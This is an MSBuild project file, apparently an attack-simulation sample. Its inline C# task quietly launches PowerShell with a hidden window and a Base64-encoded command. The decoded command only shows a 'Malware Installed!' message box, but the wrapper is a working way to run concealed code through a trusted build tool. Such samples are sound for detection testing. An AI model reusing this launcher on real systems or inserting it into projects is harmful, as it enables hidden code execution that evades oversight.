<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
    <Target Name="BuildTarget">
        <AgptPowerShell />
    </Target>

    <UsingTask
        TaskName="AgptPowerShell"
        TaskFactory="CodeTaskFactory"
        AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
        <Task>
        <Code Type="Class" Language="cs">
            <![CDATA[
            using System;
            using System.Diagnostics;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;
            public class AgptPowerShell : Task, ITask
                {
                    public override bool Execute()
                    {
                    ProcessStartInfo psi = new ProcessStartInfo()
                    {
                        FileName = "powershell.exe",
                        Arguments = "-e QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwAgAFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBNAGEAbAB3AGEAcgBlACAASQBuAHMAdABhAGwAbABlAGQAIQAnACkA",
                        UseShellExecute = false,
                        CreateNoWindow = true
                    };

                    Process.Start(psi);
                    return true;
                    }
                }
            ]]>
        </Code>
        </Task>
    </UsingTask>
</Project>